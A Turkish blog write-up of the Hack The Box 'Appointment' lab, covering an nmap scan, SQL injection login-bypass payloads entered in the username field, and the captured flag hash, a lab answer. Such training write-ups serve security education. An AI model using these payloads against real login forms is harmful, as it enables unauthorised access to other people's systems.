RUN!
121 kelime
1 dakika
Appointment
1 month ago
Makine Bilgileri
  • Platform: HTB
  • Lab: Starting Point
  • Zorluk Derecesi: Çok Kolay
  • OS: Linux
  • IP: 10.129.11.227
Cover

Adım 0: Başlangıç#

Terminal window
mkdir -p HTB/LAB/APPOINTMENT && cd HTB/LAB/APPOINTMENT
IP=10.129.11.227 && ping -c 2 $IP

Bu komutları anlamıyorsan, ilk raporlara göz at.

Adım 1: Keşif#

Nmap Taraması#

Terminal window
nmap -sC -sV $IP

Appointment-1

Bulgular#

  • Açık port >> 80/tcp (HTTP)

Tarayıcıda aç >> http://$IP/

Basit bir giriş formu var.


Adım 2: Çözüm -> SQLi#

Aşağıdaki payloadu username alanına yaz:

admin' OR '1'='1'-- -

Parola ne olursa olsun fark etmez. Sadece kutuyu doldur.

Appointment-2

  • Alternatif: ' OR 1=1-- -
SQLi

Sorgu düzgün sanitize edilmediğinde, kimlik doğrulama koşulu her zaman doğru olur ve giriş bypass edilir.

Capture the Flag#

e3d0796d002a446c0e622226f42e9672

Şimdi kendine şu soruları sor:

  • Bir giriş sayfasında SQL açığı olduğunu nasıl anlarsın?
  • Bu komutları tek tek yazmak zorunda mıyız? Kolay yolu ne?

Tamamdır!#

Şimdilik başka bir şey yok.

Appointment
https://www.hackthebox.com/
Yazar
Alp
Yayın tarihi
2026-03-20

Bazı bilgiler güncel olmayabilir